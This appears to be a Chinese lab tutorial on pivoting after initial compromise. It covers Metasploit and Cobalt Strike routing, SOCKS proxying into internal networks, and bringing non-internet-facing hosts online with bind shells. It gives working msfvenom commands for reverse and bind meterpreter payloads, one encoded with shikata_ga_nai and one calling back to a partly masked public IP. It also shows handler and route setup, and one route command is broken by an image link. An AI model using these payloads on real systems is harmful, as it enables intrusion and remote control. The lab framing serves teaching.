代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
靶场搭建
文章内容展示cs完整上线过程,msf思路等同
要点
#网络通讯-MSF&CS-路由添加&节点建立
#控制上线-MSF&CS-协议生成&正反连接
代理协议:
SOCKS4/5
代理软件:
SocksCap Proxifier ProxyChains等
靶场环境搭建描述:
- 只有Win7出网,其他均为内网环境
- 内网渗透过程中忽略利用什么漏洞方式拿到的权限
- 两个部分:1.如何进行通讯 2.如何拿到权限
MSF通讯
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -f exe > msf_7777.exe
忽略细节,将msf_7777放置windows 7上,直接上线
注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -b"\x00" -e x86/shikata_ga_nai -f exe > msfx86_7777.exe
建议使用64位,以免出现其他错误,当然64位操作系统兼容32位程序
添加路由 限于MSF
ipconfig查看是否有内网
查看路由信息
run autoroute -p
自动添加路由
run post/multi/manage/autoroute
或者手动添加指定路由,1是接收的session编号
route add 192.168.1![在这里插入图片描述](https://img-blog.csdnimg.cn/50eb5ffb00ca41efb8f7eea5e80bdce9.png)
0.0 255.255.255.0 1
bg 退出该会话 route print 查看已有路由信息
Sock代理 全局同用
到目前,只有msf可以通讯靶机内网,因为建立了路由,那么内网中其他靶机资产如何使用windows下渗透测试工具进行测试呢? 使用代理工具
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1234
run
启用代理软件配置Sock5代理
msf 内网流量转发代理
CS通讯
命令:socks port
操作:代理转发-Socks代理
cs 内网流量转发代理
内网第二层主机 不出网
这里忽略从windows 7 通过scan获得其他内网主机ip,以及通过win 10开放的服务进行渗透(横向移动),默认通过其他操作将正向连接后门上传到win 10上。视频演示为如何正常上线msf&cs
MSF控制上线-正向连接
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > msf_127bd_3333.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.xx
set lport 3333
run
CS控制上线-正向连接
监听器:bind_tcp port
命令:connect ip port
cs二层内网主机正向连接上线
实验2:三层(后续多层操作一致)
MSF控制上线-正向连接
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4455 -f exe > bd2.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.xx
set lport 4455
run
CS控制上线-正向连接
监听器:bind_tcp port
命令:connect ip port
效果图:
其它补充:
- ip地址每次重启会发生更改-DHCP协议
- 搭建环境VM虚拟网卡设置问题、增加网卡搭建环境-模拟不同局域网
- 下次更新linux环境下代理工具使用-ProxyChains
- 真实环境加入防火墙&WAf&杀毒软件 限制出入站连接等-隧道技术
- ……